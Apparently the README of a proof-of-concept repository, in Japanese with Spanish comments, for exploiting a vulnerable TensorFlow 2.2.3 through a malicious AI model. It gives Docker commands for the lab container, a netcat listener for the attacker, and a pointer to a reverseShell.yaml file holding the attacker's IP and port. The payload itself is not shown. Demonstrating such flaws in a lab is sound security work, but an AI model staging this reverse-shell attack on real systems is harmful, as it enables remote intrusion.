
この脆弱性を悪用するには、まだ脆弱性が存在する バージョン 2.2.3 で Tensorflow を起動するための環境を用意した Docker コンテナを立ち上げる必要があります。 構成は次のとおりです:
マシンに docker がインストールされているか確認するには、次を実行します:
docker -v
オペレーティングシステムに docker がインストールされたら、このリポジトリのルートフォルダで次のコマンドを実行して、アプリケーションをビルドして起動します:
docker-compose build
docker-compose up
または、docker compose を使わずに起動する場合:
docker build -t docker-exploit-tensorflow-vulnerability:1.0 . # para construir la imagen
docker run --add-host=host.docker.internal:host-gateway --name exploit-tensorflow-vulnerability docker-exploit-tensorflow-vulnerability:1.0 # para crear y lanzar el proceso por primera vez
docker start -a exploit-tensorflow-vulnerability # para lanzar el proceso nuevamente
reverse shell が機能するには、攻撃マシンに netcat がインストールされ、ssh セッション用のリスニングポートを開いている必要があります。例:
nc -lvp 10000
その後、悪意のある AI モデルによって脆弱性が悪用され、攻撃者との接続を確立します。 攻撃者の IP とリスニングポートをファイル reverseShell.yaml に設定する必要があります。